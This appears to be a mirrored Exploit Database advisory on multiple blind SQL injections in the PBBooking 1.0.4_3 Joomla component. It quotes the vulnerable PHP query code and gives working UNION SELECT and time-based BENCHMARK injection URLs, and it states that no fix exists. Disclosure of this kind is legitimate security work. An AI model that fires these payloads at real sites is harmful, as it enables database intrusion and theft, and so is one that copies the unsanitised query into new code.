Joomla! Component com_pbbooking 1.0.4_3 – Multiple Blind SQL Injections

• Exploit Database
• 155 阅读

• 作者： Salvatore Fresta
  日期： 2010-07-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14499/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85

  PBBooking 1.0.4_3 Joomla Component Multiple Blind SQL Injection   NamePBBooking Vendorhttp://sourceforge.net/projects/pbbooking/ Versions Affected 1.0.4_3   AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-07-29   X. INDEX   I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX   I. ABOUT THE APPLICATION ________________________   A simple, easy to use, calendaring and booking component for Joomla.PBBookingoffers live calendar integration both for readingavailability and for writing appointments back to your calendar.     II. DESCRIPTION _______________   Some parametersare not properly sanitised before being used in SQL queries.     III. ANALYSIS _____________   Summary:   A) Multiple Blind SQL Injection   A) Multiple Blind SQL Injection _______________________________   Theparameters timeslot and id passed to controller.php whenthetaskoptionis set respectively to save and validate,arenot properly sanitised before being used in SQL queries.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.   Affected code for id parameter:   function validate() { $pendingid = JRequest::getVar('id'); $email = JRequest::getVar('email'); $sql = "select * from #__pbbooking_pending where id = ".$pendingid;     Maybe,theinjection caused by the id parameter may be carried to a normal SQL injection,butbecause of some errorsincalendar.php,currently it is not possible. Are them errors present only on my webserver? If no, try the following injection:   index.php?option=com_pbbooking&task=validate&email=ola@ola.com&id=-1 UNION SELECT 1,'ola@ola.com',3,4,5,6,7,8,9     IV. SAMPLE CODE _______________   A) Multiple Blind SQL Injection   http://site/path/index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))     V. FIX ______   No fix.